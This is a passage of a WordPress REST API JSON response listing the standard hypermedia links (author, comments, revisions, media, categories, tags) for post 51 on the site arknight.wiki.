wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=51"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/51\/revisions"}],"predecessor-version":[{"id":54,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/51\/revisions\/54"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=51"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=51"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=51"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}